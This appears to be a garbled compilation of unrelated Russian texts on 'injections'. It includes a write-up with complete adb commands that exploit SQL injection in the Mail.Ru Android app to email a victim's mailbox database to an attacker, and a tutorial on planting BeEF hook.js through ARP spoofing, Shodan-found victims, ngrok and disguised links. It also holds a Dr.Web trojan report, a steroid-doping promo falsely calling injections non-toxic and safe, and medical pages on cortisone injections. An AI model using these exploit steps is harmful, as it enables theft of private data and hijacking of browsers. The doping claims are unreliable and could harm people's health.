Первым делом инсталлируем SDK Tools и настраиваем девайс/эмулятор. Я буду рассматривать реальный девайс, но только потому, что мне так удобнее, и вообще — комп с запущенным эмулятором греется! Права рута на устройстве сильно облегчают тебе жизнь, но для нахождения и эксплуатации многих уязвимостей они не требуются.

После настройки SDK Tools скачиваем и устанавливаем drozer из официального репозитория, ставим APK-клиент на устройство. Отлично, связанные с девайсом приготовления закончены, чтобы проверить работоспособность — подключаемся, пробросив порт (это делать необязательно, если используется реальный девайс из твоей сети, а не эмулятор):

$ adb forward tcp:31415 tcp:31415
$ drozer console connect 127.0.0.1

Ну и конечно же, ставим на устройство само приложение почты Mail.Ru, которое будем ломать. Распаковываем и декомпилируем аппликуху при помощи утилиты dex2jar. Для просмотра и поиска по исходникам я советую использовать JD-GUI, ну или можешь взять любой другой редактор кода на твой вкус. Все готово, начинаем ресерч.

Вот так выглядит успешно запущенная консоль drozer’а

INFO


Если хочешь попробовать самостоятельно провернуть все описанные действия в исследовательских целях, выкладываю для тебя именно ту версию APK-шника Mail.Ru, с которой я проводил эксперименты. Качай, пробуй, репорти баги! 🙂

 

Ищем вектор атаки

Теперь дело за малым — найти уязвимости, продумать вектор и написать эксплоит. Начинаем со сканирования приложения: ищем то, за что можно будет зацепиться. Делается это при помощи drozer’а следующим образом:

dz> run app.package.attacksurface ru.mailru.app
could not find the package: ru.mailru.app
dz> run app.package.attacksurface ru.mail.mailapp
Attack Surface:
  26 activities exported
  10 broadcast receivers exported
  2 content providers exported
  14 services exported

Как видишь, у приложения довольно много экспортированных контент-провайдеров, с них я и предлагаю начать поиски. Команда run app.provider.info -a ru.mail.mailapp выведет нам список из двух провайдеров:

ru.mail.mailbox.contacts
ru.mail.mailapp.images.cache

Кстати, можно оставить автоматическое сканирование провайдера drozer’у при помощи команды

dz> run scanner.provider.injection -a ru.mail.mailapp

Но я предпочитаю искать уязвимости руками, поэтому просто пробуем вызывать данный контент-провайдер непосредственно через adb при помощи команды am start, выполненной на устройстве. Повторюсь, так как контент-провайдер экспортирован, права root нам необязательны.

$ adb shell am start -d "content://ru.mail.mailapp.images.cache/image_parameters/0\'"
Starting: Intent { dat=content://ru.mail.mailapp.images.cache/image_parameters/0' }

Как можно увидеть, пользователю предложат выбрать, что же делать с данным URL, какой из Activity запускать. Чтобы избежать подобных вопросов, дополняем команду am параметром -n и указываем нужный нам активити, например ru.mail.mailapp/ru.mail.ui.writemail.SharingActivity. Приложение тут же завершится с ошибкой, а мы топаем в logcat, чтобы узнать, в чем проблема.

Подставляем кавычку, получаем ошибку SQL. Классика!

А проблема в том, что это типичная union-based SQL injection, которую можно классическим образом раскрутить и получить вывод (как на экран телефона, так и в системный лог):

$ adb shell am start -d "content://ru.mail.mailapp.images.cache/image_parameters/0\)\ union\ select\ 1,2,3,sqlite_version\(\),5,6,7,8--\ /" -n ru.mail.mailapp/ru.mail.ui.writemail.SharingActivity
...
Starting: Intent { dat=content://ru.mail.mailapp.images.cache/image_parameters/0) union select 1,2,3,sqlite_version(),5,6,7,8-- / cmp=ru.mail.mailapp/ru.mail.ui.writemail.SharingActivity }
$ adb logcat
...
E/BitmapFactory(15311): Unable to decode stream: java.io.FileNotFoundException: /3.8.6: open failed: ENOENT (No such file or directory)

Как оказалось, SQL-инъекции подвержен не только первый контент-провайдер, но еще и второй, доступный сторонним приложениям. Под него можно использовать следующий вектор:

$ adb shell am start -d "content://ru.mail.mailbox.contacts/account/\'\)\ union\ select\ 1,2,3,4,3,6,7,8,9,10+" -n ru.mail.mailapp/ru.mail.ui.writemail.SharingActivity

Чтобы понять, почему это происходит, предлагаю обратиться непосредственно к исходному коду декомпилированного приложения. Ответ кроется в файле, расположенном по адресу ru/mail/mailbox/content/contact/ContactsProvider.java. Как видишь, результат выполнения функции getContactAccount() попадает сразу в SQL-запрос, не проходя никаких проверок, — это и позволяет злоумышленнику проводить инъекцию.

Выполняем union-based-инъекцию и получаем вывод в ошибке

 

Раскручиваем инжект

Но этого мне было мало, я хотел получить полный доступ к файлам приложения (среди прочего и к файлу mailbox_db), расположенным в системной папке в /data/data/ru.mail.mailapp/databases/, где приложение хранит основную информацию, в том числе содержимое писем. Как можно было заметить ранее, содержимое одной из колонок отвечает за путь до прикладываемого к письму файла. Так как к файлу обращается само приложение, мы можем указать доступные именно приложению «Почта Mail.Ru» файлы, например /data/data/ru.mail.mailapp/databases/mailbox_db.

Тогда выбранный вектор примет, например, следующий вид:

$ adb shell am start -d "content://ru.mail.mailbox.contacts/account/\'\)\ union\ select\ 111,\'%2fdata%2fdata%2fru.mail.mailapp%2fdatabases%2fmailbox_db\',333,444,555,666,777,888,99,100500--+" -n ru.mail.mailapp/ru.mail.ui.writemail.SharingActivity

Судя по тому, что файл приаттачился и ниже указан его реальный размер, можно сделать вывод, что вектор успешно сработал и мы «подгрузили» в письмо интересующий нас объект. Все бы ничего, но все равно нужно, чтобы пользователь отправил данное письмо с приложенным файлом…

Приложение после инъекции, можно увидеть, какая колонка за что отвечает

Так как нам доступны некоторые экспортированные activity, среди них можно обнаружить следующий — ru.mail.ui.writemail.MailToMySelfActivity, который отвечает за автоматическую отправку писем «себе». Используем его в конечном векторе атаки, чтобы письмо сразу отправлялось без какого-либо участия со стороны пользователя. Добавляем к нему предыдущий вектор и в качестве extras указываем нашу почту и другие данные для отправки. Эти параметры, кстати, можно тоже нехитрым образом отыскать в исходном коде (буквально грепая по сорцам). Но я их как-то довольно быстро угадал и без подсказок.

Конечный вектор атаки выглядит следующим образом:

$ adb shell am start -W -a android.intent.action.SEND -e android.support.v4.app.EXTRA_CALLING_PACKAGE "ru.mail.mailapp" --ecn android.support.v4.app.EXTRA_CALLING_ACTIVITY "ru.mail.mailapp/ru.mail.ui.writemail.MailToMySelfActivity" -d "content://ru.mail.mailbox.contacts/account/\'\)\ union\ select\ 1,\'%2fdata%2fdata%2fru.mail.mailapp%2fdatabases%2fmailbox_db\',3,4,5,6,7,8,9,2--+" -e android.intent.extra.TEXT "pew-pew" -e android.intent.extra.SUBJECT "PWND" --esa android.intent.extra.EMAIL "[email protected]" -n ru.mail.mailapp/ru.mail.ui.writemail.MailToMySelfActivity

где EMAIL — наш почтовый ящик, на который придет письмо с указанным файлом (в данном случае это файл /data/data/ru.mail.mailapp/databases/mailbox_db).

Указываем в качестве значения колонки адрес файла с БД писем

Что же произойдет после запуска данной команды? Приложение запустится, через SQL injection вектор подгрузит указанный файл и выполнит отправку письма «самому себе», не игнорируя при этом наши передаваемые extras. Демонстрацию работы эксплоита можно посмотреть на видео:

 

Итог

Таким образом, мы, используя описанную технику, можем без root-прав не только выполнять SQL-запросы к некоторым доступным таблицам, но и получать и сливать все файлы, доступные приложению. Повторюсь, что для этого вектора не нужны никакие действия на самом телефоне. Также стоит отметить, что использовать эту атаку сможет любое стороннее приложение, установленное на устройстве. Специально для проведения подобного рода атак на черном рынке существует услуга «инсталлов» твоего вредоносного приложения на большое количество устройств ни о чем не подозревающих пользователей.

Естественно, я сообщил обо всех уязвимостях в BugBounty Mail.Ru, но, к сожалению, вознаграждения не получил, а официальный ответ был такой:

Few mistakenly exported Content providers and activities are reported to have vulnerabilities, allowing application data access and manipulation. This report was marked as a duplicate due to known fact activities and content providers are exported by mistake (fix is under development).

Почему статус репорта изменился на None Applicable, хоть уязвимости и присутствовали в официальном приложении на момент репорта? Я не знаю, но продолжать искать уязвимости в продуктах и сервисах Mail.Ru мне теперь не особо хочется. Надеюсь, что другие в этом преуспеют лучше меня, в любом случае — удачи! 🙂

Троянец для браузера Firefox осуществляет веб-инжекты

Число узнаваемых вирусным аналитикам вредных программ, которые созданы для демонстрации пользователям Интернета раздражающей рекламы, возрастает день ото дня. Компания «Доктор Веб» сообщает об обнаружении нескольких схожих троянцев, 1 из которых, получивший наименование Trojan.Ormes.186, встраивает рекламу в просматриваемые жертвой интернет-страницы с использованием технологии веб-инжектов.

Вредная программа Trojan.Ormes.186 представляет собой расширение для браузера Mozilla Firefox, состоящее из 3-х файлов, написанных на языке JavaScript. 1 из этих файлов зашифрован и предназначен для демонстрации различного рода рекламы, а два других встраивают его в открываемые в окне браузера интернет-страницы конкретно на компьютере жертвы: схожая технология называется веб-инжектом.

Основной код троянца размещен в зашифрованном файле и именно он реализует главные функции Trojan.Ormes.186 по встраиванию стороннего содержимого в интернет-страницы. В теле вредной программы содержится перечень, состоящий из порядка 200 адресов интернет-ресурсов, при обращении к которым Trojan.Ormes.186 делает веб-инжекты. Среди их — разные веб-сайты для поиска и размещения вакансий, также адреса фаворитных поисковых машин и общественных сетей.

В коде троянца предусмотрена особая функция, предположительно реализующая возможность автоматической эмуляции щелчка мышью на разных элементах веб-страниц с целью подтверждения подписок для абонентов мобильных операторов «Мегафон» и «Билайн». Кроме этого, при открытии в окне браузера веб-сайтов «Яндекс», Youtube, также общественных сетей «ВКонтакте», «Одноклассники» и Facebook Trojan.Ormes.186 загружает с удаленного веб-сайта и делает соответственный сценарий, который через цепочку редиректов перенаправляет жертву на веб-сайты разных файлообменных систем, использующих для монетизации платные подписки. В процессе работы с пользующимися популярностью поисковыми машинами троянец также встраивает в страницы с отображаемыми в итоге обработки запроса ссылками рекламные баннеры. В страницы социальной сети Facebook данная вредная программа вводит сокрытый элемент iframe (с целью установки внутренних переменных, нужных для работы троянца), по этому Trojan.Ormes.186 может автоматом устанавливать отметку «Like» («мне нравится») ряду сайтов из специального перечня.

Среди других способностей Trojan.Ormes.186 специалисты отмеяают функцию автоматического входа на веб-сайты онлайн-казино, перечень которых также имеется в теле вредной программы. Если веб-сайт содержит предложение об установке приложения для общественных сетей, троянец делает автоматическое перенаправление пользователя на страницу такового приложения. Отслеживая открытие схожих страниц, Trojan.Ormes.186 эмулирует щелчок мышью по ссылке, разрешающей установку, — в итоге приложение инсталлируется практически без участия пользователя.

В случае возникновения признаков активности троянца Trojan.Ormes.186, таких как заметное замедление работы браузера Firefox и возникновение на просматриваемых интернет-страницах подозрительной рекламы, специалисты компании «Доктор Веб» советуют пользователям выполнить сканирование устройства штатными средствами Антивируса Dr.Web, также проверить перечень установленных расширений браузера и удалить плагин с именем NetFilterPro и описанием «Additional security for safe browsing experience».

Взлом браузера и Инжекты | AREL

Запускается Beef либо через вкладку с приложениями, но я запущю через терминал

Далее заходим в браузер и вводим:
http://localhost:3000 или http://127.0.0.1:3000
У нас открывается веб интерфейс Beef, теперь можно приступать к работе
Вводим login pass и продолжаем:

Итак, мы в инструменте, для начала выберем жертву, но тут уже мы будем искать не в shodan, а простым методом, соц.сети.
Для поимки жертвы в beef есть XSS код, hook.js, который мы должны передать жертве в виде ссылки.

<script src=»http://<IP>:3000/hook.js»></script>

Давай те его модифицируем, для этого пропишем ifconfig и найдём свой ip адрес
нам нужен inet параметр, тобишь ваш ip в Kali linux
После модификации код будет выглядеть вот так:
Теперь эту ссылку нужно передать жетве, для этого нам нужно её вывести в глобальную сеть и замаскировать
Работа с ссылкой​
Тут есть два вариатна, либо инжект через bettercap, либо вывод ссылки в WAN сеть через ngrok, рассмотрим оба варика
Инжект ссылки​
Давайте установим и запустим bettercap
wget «https://github.com`curl -s https://github.com/bettercap/bettercap/releases | grep -E -o ‘/bettercap/bettercap/releases/download/v[0-9.]+/bettercap_linux_amd64_(|v)[0-9.]+zip’ | head -n 1`»

unzip bettercap_linux_amd64_v2.31.1.zip


Нам нужно включить модули http.proxy и arp.proxy
Посмотрим какие модули активны

Давай те включим нужные нам модули
Далее, запустим сеанс инжекта с нашей ссылкой

set http.proxy.script /home/tcherber/hook.js

set arp.spoof.targets 124.33.132.17

Перейдём на shodan и возьмём для этого способа некоторых жертв
Пример запроса на устройства: os:Windows 2003

На удалённых хостах внедряется ссылка на js скрипт фреймворка beef-xss и мы открываем для себя широкий круг опций для проведения дальнейшей атаки.

Beef в WAN сети​
Давайте начнем с загрузки ngrok и установки его в системе, поэтому перейдите по этой ссылке https://ngrok.com/download.
Установка ngrok​
wget `curl -s https://ngrok.com/download | grep -o -E ‘https://bin.equinox.io/c/[A-Za-z0-9]{4,}/ngrok-stable-linux-amd64.zip’`

unzip ngrok-stable-linux-amd64.zip

./ngrok authtoken ( ваш токен, зарегайтесь )


Теперь мы открываем терминал и набираем ngrok http 3000 ( хандлер beef )
Запускается тунель, и мы получаем вот такую ссылку:

Теперь установим утилиту которая создаст payload beef вне локальной сети
git clone https://github.com/stormshadow07/BeeF-Over-Wan.git
Модуль также генерирует файл hook.js по пути /var/www/html/hook.js
Активирует инструмент beef,который слушает ,как известно ,порт 3000
BeeF-Over-Wan сам преобразует и сгенерирует необходимую ссылку

Вот результат компиляции, теперь ссылка доступна в Глобальной сети

P.s замените файл base.js на hook.js ( в папке с софтом ) , а так же в .py файле скрипта в 8 линии уберите строку from termcolor import colored
Маскировка ссылки​
Далее давай те замаскируем нашу ссылку, что бы жертва не догадывалась, что это ngrok
Установим утилиту для маскировки ссылок ( так же пойдёт для фиша ):
git clone https://github.com/jaykali/maskphish

Далее вводим нашу ссылку в поле для ввода, затем нам нужно будет выбрать url который мы хотим видеть в начале ссылки, к примеру youtube.com
Вводим ключевые слова, которые будут использоваться в ссылке, зависит от вашего метода преподнесения ссылки. ( в ютубе много символов в строчке )
Кстати, гляньте это видео — Вот, что у меня вышло, немного кривовато:

Осталось передать ссылку жертве, думаю это не составит труда, ведь жертва должна просто перейти по ссылке ( если не хочет переходить инжект в руки )
После того, как жертва перейдёт по ссылке, в Beef, появится сессия.

Допинг в ампулах. ЧАВО для ньюбегиннера · IRONHEART

Готовишь шприц, стреляешь — обеспечиваешь 100% попадание препарата вовнутрь. Исключительно с таблеточными ААС, стероиды в инжектах открываются сполна. Жидкий препарат не модифицируется, что случается с таблами, бьет напрямик в кровоток.

Реально будет курсануть только оралками при планировании супер качественного цикла? Вследствие чего инъективные стероиды должны дополнять каждый анаболический коктейль? Инъекционная спортфарма — основа офигенных преимуществ, недостающая часть. Retabolil в таблетированном формате замечал?

Болденон заточен на долгосрочное влияние, навязывает циклы подольше, доступен в форме долговременных эфиров. Болд предоставит могучий памп, плюс венозность, проявит мышцы и нальет кровообращение оксигеном.

Инъекции целиком освобождены от вредоносного воздействия, который свойственен оральным анаболикам, они минуют желудочные ферменты и рубят в кровообращение неизменно.

Грамотеи распространяют сказки, говорят маслице — убийственный токсин, любые инъективные анаболики гробят гормоналку, а это несусветная ересь.

Когда хочешь урвать реальное мясцо, но не просто гнать жидкости — тут потребуются инъекции.

Что надо уметь?

Анаболические инъекции — ценный инструмент набора наметанного атлета, хотя “эксперты” доказывают другое.

Становись лучше — контролируй эстерами ритм эффектов и дозировки анаболиков — выбирай комбинации с толком! Беспечный подход и ошибочные комбинации — коренная первопричина проблем во время употребления иньекций.

Инъекции — перворазрядный тандем для самых эффективных оралок, комбинация срывает голову. Всего пара-тройка простых понятий отлично поддержат самочувствие, плюс принесут только достижения.

  • Невозможно допустить актуальный допинг, в каком не применяются продуктивные инъекции спортивных средств.
  • Хотя им свойственна некоторая гепатотоксичность, оральные анаболики значимы, необычайно результативные, они нередко нужны.
  • Boldenone — не имеющий реальных соперников, лидер по производительности.

Неграмотные умники понаслышке рекомендуют пользовать только капсулы, чем усложняют задачу молодых бодибилдеров.

Результаты инжектов

Добавляют энергии и сделают трени эффективнее. Характеристики стандартного компота поднимают какраз инжекты. Постоянная молярность, без гормонных ям. Инжекты не токсичны, потому безопасны.

Различные продолжительности эфирной молекулы удовлетворяют всевозможные sport задания. Секса захочется много — андрогенные инъекции дадут по либидо.

Дефицит дополнительной нагрузки даст возможность комплектовать отпадные курсы. Анаболические колёса — однозначно прикольная вещь, хотя инжекты — большая часть билдерских допингов. Инъекционные препы допустимо применять достаточно долго, колеса могут давить печень спустя пять неделек.

Инъекций суставов и мягких тканей

Уколы суставов и мягких тканей — уколы иглой. Их можно вводить в сустав, например в колено, или в участок мягких тканей, например в пространство между мышцей и костью. Инъекции могут помочь диагностировать или лечить множество различных состояний. Примеры включают:

  • бурсит
  • тендинит
  • артрит
  • остеоартроз
  • синдром запястного канала
  • ревматизм

Иглу можно использовать для удаления жидкости или введения лекарств.Противовоспалительные препараты являются наиболее распространенными препаратами для инъекций. К ним относятся кортикостероиды и болеутоляющие, например лидокаин. Перед инъекцией важно сообщить врачу, если у вас аллергия на стероиды или другие лекарства.

Путь к улучшению здоровья

Перед уколом ваш врач, вероятно, назначит вам местный анестетик. Это помогает уменьшить боль от инъекционной иглы. После укола у вас может появиться некоторая боль, когда действие анестетика прекратится.Спросите своего врача, можно ли вам принимать оральное обезболивающее. Также можно несколько раз в день прикладывать лед к участку на 15 минут.

Некоторым людям требуется более одной инъекции. Ваш врач поговорит с вами о том, сколько вам нужно и как часто.

Что нужно учитывать

У инъекций есть возможные побочные эффекты. Наиболее распространены отек и раздражение. Они известны как обострение после инъекции и могут длиться до 48 часов. Менее распространенными побочными эффектами являются инфекция, разрыв сухожилий и повреждение мышц.Чтобы снизить риск заражения, следуйте инструкциям врача и содержите место инъекции в чистоте.

Когда обращаться к врачу

Немедленно позвоните своему врачу, если у вас есть:

  • покраснение
  • тепло на участке
  • продолжающаяся боль
  • лихорадка
  • аномальная реакция

Вопросы к врачу

  • Каковы преимущества и риски инъекций?
  • Сколько инъекций мне нужно и как часто?
  • Какие у меня ограничения после укола?

Ресурсы

Американский семейный врач: инъекции в суставы и мягкие ткани

Авторские права © Американская академия семейных врачей

Эта информация представляет собой общий обзор и может не относиться ко всем.Поговорите со своим семейным врачом, чтобы узнать, применима ли эта информация к вам, и получить дополнительную информацию по этому вопросу.

инъекций кортизона — Mayo Clinic

Обзор

Уколы кортизона — это инъекции, которые могут помочь уменьшить боль и воспаление в определенной области вашего тела. Чаще всего их вводят в суставы, такие как лодыжка, локоть, бедро, колено, плечо, позвоночник или запястье. Уколы кортизона могут помочь даже маленьким суставам на руках или ногах.

Инъекции обычно содержат кортикостероидные препараты и местный анестетик. Часто вы можете получить его в кабинете врача. Из-за потенциальных побочных эффектов количество прививок, которые вы можете сделать в год, обычно ограничено.

Продукты и услуги

Показать больше товаров от Mayo Clinic

Почему это делается

Уколы кортизона могут быть наиболее эффективными при лечении воспалительного артрита, такого как ревматоидный артрит.Они также могут быть частью лечения других заболеваний, в том числе:

  • Боль в спине
  • Бурсит
  • Подагра
  • Остеоартроз
  • Псориатический артрит
  • Реактивный артрит
  • Ревматоидный артрит
  • Тендинит

Риски

Возможные побочные эффекты уколов кортизона усиливаются при больших дозах и повторном применении.Побочные эффекты могут включать:

  • Повреждение хряща
  • Смерть ближайшей кости
  • Совместная инфекция
  • Повреждение нерва
  • Временное промывание лица
  • Временное обострение боли и воспаления в суставе
  • Временное повышение сахара в крови
  • Ослабление или разрыв сухожилия
  • Истончение близлежащей кости (остеопороз)
  • Истончение кожи и мягких тканей вокруг места инъекции
  • Отбеливание или осветление кожи вокруг места инъекции

Ограничения на количество инъекций кортизона

Есть опасения, что повторные инъекции кортизона могут повредить хрящ в суставе.Поэтому врачи обычно ограничивают количество инъекций кортизона в сустав.

Как правило, вам не следует делать инъекции кортизона чаще, чем каждые шесть недель и обычно не чаще трех или четырех раз в год.

Как вы готовитесь

Если вы принимаете антикоагулянты, возможно, вам придется прекратить их прием за несколько дней до введения кортизона, чтобы снизить риск кровотечения или синяков. Некоторые пищевые добавки также разжижают кровь.Спросите своего врача, каких лекарств и добавок вам следует избегать перед уколом кортизона.

Сообщите своему врачу, если в предыдущие две недели у вас была температура 100,4 F (38 C) или выше.

Что можно ожидать

Во время укола кортизоном

Ваш врач может попросить вас переодеться в халат. Затем вас разместят так, чтобы врач мог легко ввести иглу.

Область вокруг места укола очищена.Ваш врач может также применить анестезирующий спрей, чтобы обезболить область, в которую будет введена игла. В некоторых случаях ваш врач может использовать ультразвук или рентгеновский снимок, называемый рентгеноскопией, чтобы наблюдать за продвижением иглы внутри вашего тела, чтобы поместить ее в нужное место.

Скорее всего, вы почувствуете некоторое давление, когда игла вставлена. Сообщите своему врачу, если вы испытываете сильный дискомфорт.

Затем лекарство попадает в место инъекции. Как правило, уколы кортизона включают кортикостероидные препараты для облегчения боли и воспаления с течением времени и анестетик для немедленного облегчения боли.

После прививки кортизоном

У некоторых людей после прививки кортизоном появляется покраснение и ощущение тепла в груди и лице. Если у вас диабет, укол кортизона может временно повысить уровень сахара в крови.

После инъекции кортизона ваш врач может спросить вас:

  • Защищайте место инъекции в течение дня или двух. Например, если вы получили укол кортизона в плечо, избегайте подъема тяжестей. Если вам сделали укол кортизона в колено, по возможности не стойте на ногах.
  • Приложите лед к месту инъекции, чтобы уменьшить боль. Не используйте грелки.
  • Не использовать ванну, гидромассажную ванну или гидромассажную ванну в течение двух дней. Принимать душ — это нормально.
  • Следите за признаками инфекции, включая усиливающуюся боль, покраснение и припухлость, которые сохраняются более 48 часов.

Результаты

Результаты инъекций кортизона обычно зависят от причины лечения. Уколы кортизона обычно вызывают временную вспышку боли и воспаления на срок до 48 часов после инъекции.После этого боль и воспаление пораженного сустава уменьшатся и могут длиться до нескольких месяцев.

глазных инъекций — Американская академия офтальмологии

Знаете ли вы, что воткнув иглу в глаз, вы можете спасти зрение?

В частности, офтальмологи вводят лекарства прямо в глазное яблоко для лечения определенных заболеваний.Офтальмологи называют эти уколы интравитреальными инъекциями, и они могут спасти ваше зрение.

Диабетическая болезнь глаз, AMD и окклюзия вены сетчатки хорошо поддаются инъекциям лекарств. У многих пациентов улучшается зрение!

Чего ожидать во время инъекции в глаз

Так чего же ожидать, если офтальмолог порекомендует сделать инъекцию в глаз?

  1. Анестетик обезболит поверхность глазного яблока, и вы не почувствуете боли.Анестетик может быть в форме глазных капель или геля для глаз. Иногда вам делают небольшую инъекцию обезболивающего.
  2. Антисептик для глаз и век поможет предотвратить заражение бактериями около глаза.
  3. Ваш офтальмолог, скорее всего, поможет вам держать глаз открытым с помощью небольшого приспособления, называемого зеркалом. Это также помогает предотвратить заражение бактериями век.
  4. Ваш офтальмолог попросит вас смотреть в определенном направлении, чтобы помочь вам не видеть иглу, и поможет ему ввести лекарство в определенную часть глаза.
  5. Вы получите укол. Игла очень тонкая. Вероятно, вы почувствуете только давление, а не резкое ощущение. Инъекция осуществляется через белую часть глаза.

Ваш офтальмолог удалит зеркало века после инъекции. Они очистят ваш глаз, чтобы удалить антисептик. Они также проверит глаз, чтобы убедиться, что нет проблем или осложнений. Типичный процесс инъекции обычно занимает от начала до конца от 10 до 15 минут.

Чего ожидать после инъекции в глаз

В течение нескольких часов у вас может появиться раздражение глаз. У вас также может быть пятно крови на глазу (так называемое субконъюнктивальное кровоизлияние) в месте инъекции. Это случается редко и обычно проходит в течение недели.

К счастью, осложнения после глазных инъекций случаются редко. Но вам следует позвонить своему офтальмологу, если у вас есть какие-либо из следующих признаков или симптомов:

инъекций стероидов

Обзор

Что такое стероиды?

Стероиды (сокращение от кортикостероидов) — это искусственные препараты, которые очень похожи на кортизол, гормон, вырабатываемый вашими надпочечниками естественным путем.Кортикостероиды отличаются от стероидных соединений, связанных с мужскими гормонами, которыми злоупотребляют некоторые спортсмены.

Стероиды уменьшают воспаление и снижают активность иммунной системы. Стероиды используются для лечения различных воспалительных заболеваний и состояний.

Почему вводят стероиды?

Введение стероидов в одну или две локальные области воспаления позволяет врачам доставить большую дозу лекарства непосредственно в проблемную зону. Когда врачи вводят стероиды внутрь или внутривенно, они не могут быть уверены, что достаточное количество стероида в конечном итоге достигнет проблемной зоны.

Какие состояния лечат с помощью инъекций стероидов?

Стероиды часто вводят непосредственно в суставы для лечения таких состояний, как ревматоидный артрит, подагра или другие воспалительные заболевания. Стероиды также можно вводить в воспаленную сумку (бурсит) или вокруг воспаленных сухожилий (тендинит) около плеча, локтя, бедра, колена, кисти или запястья.

Какую роль играют инъекции стероидов в общей программе лечения?

Инъекции стероидов могут быть добавлены к программе лечения, которая может уже включать анальгетики (обезболивающие), противовоспалительные препараты, физиотерапию, трудотерапию и / или поддерживающие устройства, такие как трости и подтяжки.Использование одного или нескольких из этих методов лечения зависит от характера проблемы. Например, у здорового человека тендинит можно адекватно лечить только местной инъекцией стероидов. Однако у пациента с ревматоидным артритом инъекции обычно являются небольшой частью многостороннего подхода к лечению.

Детали процедуры

Как назначаются стероиды?

Стероидные препараты доступны в нескольких формах, которые различаются по тому, насколько легко они растворяются или как долго остаются в организме.

Стероиды можно назначать системно, то есть по всей системе или организму, или локально в то место, где существует проблема.

Системные стероиды можно вводить через вену (внутривенно), в мышцу (внутримышечно) или перорально (перорально). Местные стероиды можно вводить в виде глазных капель, ушных капель или кремов для кожи, а также путем прямой инъекции в суставы, сумки (смазывающие мешочки между определенными сухожилиями и костями под ними) или вокруг сухожилий или других участков мягких тканей.

Стероид вводится шприцем и маленькой иглой в целевую область. Как правило, заранее проводят некоторую форму анестезии лидокаином или спреем. Кратковременная и обычно незначительная боль во время процедуры является обычным явлением. Степень боли будет зависеть от места укола и индивидуального пациента.

Когда нельзя делать инъекции стероидов?

Стероиды не следует вводить при наличии инфекции в области инъекции или в других частях тела.Если сустав уже сильно разрушен, инъекции вряд ли помогут.

Перед введением в сустав стероида жидкость из сустава может быть удалена для тестирования. Анализ суставной жидкости особенно важен, если диагноз неясен. Инъекции стероидов часто уменьшают воспаление суставов, помогая сохранить структуру и функцию суставов.

Если у пациента есть потенциальная проблема с кровотечением или он принимает антикоагулянты (часто называемые антикоагулянтами), инъекции стероидов могут вызвать кровотечение в этом месте.Этим пациентам инъекции следует делать с большой осторожностью.

Частые инъекции стероидов, чаще, чем раз в три или четыре месяца, не рекомендуются из-за повышенного риска ослабления тканей в обрабатываемой области.

Риски / преимущества

Когда мой врач назначит инъекции стероидов?

Решение о назначении стероидов всегда принимается в индивидуальном порядке. Ваш врач примет во внимание ваш возраст, физическую активность и другие лекарства, которые вы принимаете.Ваш врач также убедится, что вы понимаете потенциальные преимущества и риски инъекций стероидов.

Каковы ожидаемые преимущества инъекций стероидов?

Основные преимущества для пациента заключаются в уменьшении боли и улучшении функций. Инъекции стероидов часто уменьшают воспаление суставов, помогая сохранить структуру и функцию суставов.

Местные инъекции обычно хорошо переносятся и менее склонны вызывать серьезные побочные эффекты, чем другие формы стероидных препаратов.

Инъекции стероидов могут помочь избежать необходимости в пероральных стероидах или повышенных дозах пероральных стероидов, которые могут иметь более сильные побочные эффекты.

Каковы потенциальные недостатки инъекций стероидов?

Инъекции стероидов — один из самых эффективных способов уменьшить боль и улучшить функцию, но обычно они не излечивают болезнь.

Кратковременная и обычно незначительная боль во время инъекции является обычным явлением.

В редких случаях могут возникнуть следующие побочные эффекты:

  • Инфекция.
  • Аллергические реакции.
  • Местное кровотечение.
  • Разрыв сухожилия.
  • Длительная боль.
  • Изменение цвета кожи.

Чрезмерно частые повторные инъекции в одну и ту же область могут привести к ослаблению костей, связок и сухожилий.

Восстановление и Outlook

У всех есть побочные эффекты?

Не у всех разовьются побочные эффекты. Частота возникновения побочных эффектов варьируется от пациента к пациенту.Если инъекции стероидов проводятся нечасто (реже, чем каждые три-четыре месяца), возможно, что ни один из перечисленных побочных эффектов не возникнет.

инъекций от боли в спине: цель, процедура, побочные эффекты

Когда боль в спине не пройдет, ваш врач рассмотрит все методы лечения, которые могут вам помочь, от упражнений и физиотерапии до лекарств. Часть этого может включать инъекции, чтобы облегчить боль в спине и воспаление. Эти уколы обычно состоят из стероидов и обезболивающих.

Имейте в виду, что, хотя эти уколы помогают некоторым людям, не все получают одинаковое облегчение.

Что они лечат

Инъекции в спину могут помочь в лечении двух основных проблем, связанных с болью в спине:

Воспаление или повреждение нерва , обычно в шее или пояснице. Врачи называют это «радикулопатией». Проблема возникает там, где нерв выходит из позвоночника. При радикулопатии резкая боль распространяется от поясницы вниз к одной или обеим ногам или от шеи к руке.Грыжа межпозвоночного диска может вызвать радикулопатию.

Стеноз позвоночного канала, означает, что позвоночник сужен. Это может произойти из-за того, что грыжа межпозвоночного диска давит на позвоночник, или из-за того, что в это пространство выступает костная шпора, или, что реже, если опухоль давит на позвоночник. Стеноз позвоночника сдавливает нервы внутри. Обычно это вызывает боль в ягодице или ноге. У вас может быть или не быть боли в спине. Боль из-за стеноза позвоночного канала может усиливаться, когда вы ведете активный образ жизни, и уменьшаться, когда вы наклоняетесь вперед.

Врачи также применяют инъекции при других болях в спине. Иногда они также используют их, чтобы выяснить, что вызывает боль.

Уколы можно делать в область вокруг воспаленных или поврежденных нервов. Существует несколько видов инъекций, в том числе:

Инъекции при блокаде нерва

При блокаде нерва врач вводит в область вокруг нерва обезболивающее или обезболивающее. Лидокаин — наиболее часто используемый анестетик.

После инъекции нервной блокады вы быстро почувствуете онемение и почти полностью избавитесь от боли.Через несколько часов он стирается.

Дискография

Некоторые врачи используют инъекции нервной блокады, чтобы попытаться диагностировать причину боли в спине. Если это сделает ваш врач, вас спросят, какая инъекция вызывает исчезновение боли в спине. Затем этот нерв можно выбрать для эпидуральной инъекции как стероидов, так и анестетиков. Или ваш врач может решить попробовать другое лечение.

Эпидуральные инъекции

Эпидуральная анестезия означает «вокруг спинного мозга». Эти уколы включают стероидное лекарство, также называемое кортикостероидом, и, как правило, анестезирующее лекарство.Насколько они эффективны, пока не ясно. Их эффекты, кажется, длится недолго и дают умеренное облегчение боли. Так что это может быть не то, что вы получите от длительной боли в спине. А если боль в спине началась внезапно, ваш врач, вероятно, рассмотрит в первую очередь другие методы лечения.

Побочные эффекты

Легкая болезненность или боль в месте инъекции при болях в спине являются обычным явлением. Также могут возникнуть головная боль, тошнота и рвота.

Это редко, но инъекции могут вызвать кровотечение или инфекцию.Вам следует обсудить риски, преимущества и другие варианты со своим врачом.

Инъекция кортизона (инъекция кортикостероидов)

Что такое укол кортизона?

